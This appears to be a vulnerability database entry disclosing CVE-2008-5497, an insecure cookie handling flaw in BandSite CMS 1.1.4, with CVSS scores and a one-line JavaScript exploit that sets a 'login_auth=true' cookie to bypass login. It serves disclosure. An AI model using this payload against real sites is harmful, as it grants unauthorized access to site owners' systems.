BandSite CMS 1.1.4 Insecure Cookie Handling Vulnerability

2008.12.14

Credit: Mountassif Moad

Risk: High

Local: No

Remote: Yes

CVE: CVE-2008-5497

CWE: CWE-287

CVSS Base Score: 7.5/10

Impact Subscore: 6.4/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

###########################################################################
[+] BandSite CMS 1.1.4 Insecure Cookie Handling Vulnerability
[+] Discovered By Mountassif Moad                   
[+] www.v4-team.com                     
[+] Greetz : All my Freind
###########################################################################
Exploit:
javascript:document.cookie = "login_auth=true; path=/";

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

BandSite CMS 1.1.4 Insecure Cookie Handling Vulnerability

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

BandSite CMS 1.1.4 Insecure Cookie Handling Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.